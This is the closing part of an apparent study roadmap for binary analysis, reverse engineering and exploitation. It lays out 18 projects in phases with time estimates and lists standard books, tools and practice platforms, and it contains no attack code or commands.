| 13 | Binary Diffing    | ⭐⭐       | 1-2 weeks  | Patch Analysis          | ⭐⭐⭐     |
| 14 | Anti-Debug Bypass | ⭐⭐⭐     | 2-3 weeks  | Anti-Analysis           | ⭐⭐⭐⭐   |
| 15 | Decompiler        | ⭐⭐⭐⭐⭐ | 2-3 months | Code Recovery           | ⭐⭐⭐⭐   |
| 16 | CTF Practice      | ⭐⭐⭐     | Ongoing    | Competition Skills      | ⭐⭐⭐⭐⭐ |
| 17 | radare2 Mastery   | ⭐⭐       | 2-3 weeks  | CLI Tools               | ⭐⭐⭐⭐   |
| 18 | Complete Toolkit  | ⭐⭐⭐⭐⭐ | 2-3 months | Integration             | ⭐⭐⭐⭐   |

Phase 1: Foundations (4-6 weeks)

Build understanding of binary formats and tools:

  1. Project 1: ELF Parser - Understand Linux binaries
  2. Project 2: PE Parser - Understand Windows binaries
  3. Project 4: GDB Deep Dive - Master debugging
  4. Project 9: strace/ltrace - Quick dynamic analysis

Phase 2: Reverse Engineering (4-6 weeks)

Learn to understand unknown binaries:

  1. Project 5: Ghidra RE - Static analysis
  2. Project 17: radare2 Mastery - CLI analysis
  3. Project 6: Crackme Challenges - Apply skills

Phase 3: Exploitation (6-8 weeks)

Learn to exploit vulnerabilities:

  1. Project 7: Buffer Overflow - Basic exploitation
  2. Project 8: ROP Chains - Bypass protections
  3. Project 16: CTF Practice - Competition experience

Phase 4: Advanced Analysis (6-8 weeks)

Master advanced techniques:

  1. Project 10: Malware Lab - Real-world analysis
  2. Project 11: angr - Automated analysis
  3. Project 12: Fuzzing - Vulnerability discovery
  4. Project 14: Anti-Debug Bypass - Defeat protections

Phase 5: Mastery (2-4 months)

Build professional tools:

  1. Project 3: Disassembler - Deep instruction knowledge
  2. Project 13: Binary Diffing - Patch analysis
  3. Project 15: Decompiler - Code recovery
  4. Project 18: Complete Toolkit - Professional tools

Summary

| #  | Project                          | Main Language   |
|----|----------------------------------|-----------------|
| 1  | ELF File Parser                  | C               |
| 2  | PE File Parser                   | C               |
| 3  | Build a Disassembler             | C               |
| 4  | GDB Debugging Deep Dive          | GDB/Python      |
| 5  | Ghidra Reverse Engineering       | Ghidra/Java     |
| 6  | Crackme Challenges               | Assembly/Python |
| 7  | Buffer Overflow Exploitation     | C/Python        |
| 8  | Return-Oriented Programming      | Python          |
| 9  | Dynamic Analysis (strace/ltrace) | Shell           |
| 10 | Malware Analysis Lab             | Assembly/Python |
| 11 | Symbolic Execution (angr)        | Python          |
| 12 | Fuzzing with AFL++               | C/Shell         |
| 13 | Binary Diffing                   | Python          |
| 14 | Anti-Debugging Bypass            | Assembly/Python |
| 15 | Build a Decompiler               | Python          |
| 16 | CTF Binary Exploitation          | Python          |
| 17 | radare2 Mastery                  | r2/Python       |
| 18 | Complete Binary Analysis Toolkit | Python          |

Resources

Essential Books

  • “Practical Binary Analysis” by Dennis Andriesse - Best overall introduction
  • “Hacking: The Art of Exploitation” by Jon Erickson - Classic exploitation book
  • “Practical Malware Analysis” by Sikorski & Honig - Malware-focused
  • “Reversing: Secrets of Reverse Engineering” by Eldad Eilam - In-depth RE
  • “The Shellcoder’s Handbook” by Chris Anley et al. - Advanced exploitation

Tools

  • Ghidra: https://ghidra-sre.org/ - Free decompiler
  • radare2: https://rada.re/ - Open source RE framework
  • pwntools: https://docs.pwntools.com/ - Exploit development
  • angr: https://angr.io/ - Binary analysis framework
  • AFL++: https://aflplus.plus/ - Fuzzer

Practice Platforms

  • pwnable.kr: https://pwnable.kr/ - CTF challenges
  • crackmes.one: https://crackmes.one/ - Reverse engineering
  • ROP Emporium: https://ropemporium.com/ - ROP practice
  • Nightmare: https://guyinatuxedo.github.io/ - Walkthroughs


Total Estimated Time: 8-12 months of dedicated study

After completion: You’ll be able to analyze any binary, find vulnerabilities, write exploits, analyze malware, and build professional reverse engineering tools. These skills are in high demand for security research, vulnerability assessment, malware analysis, and CTF competitions.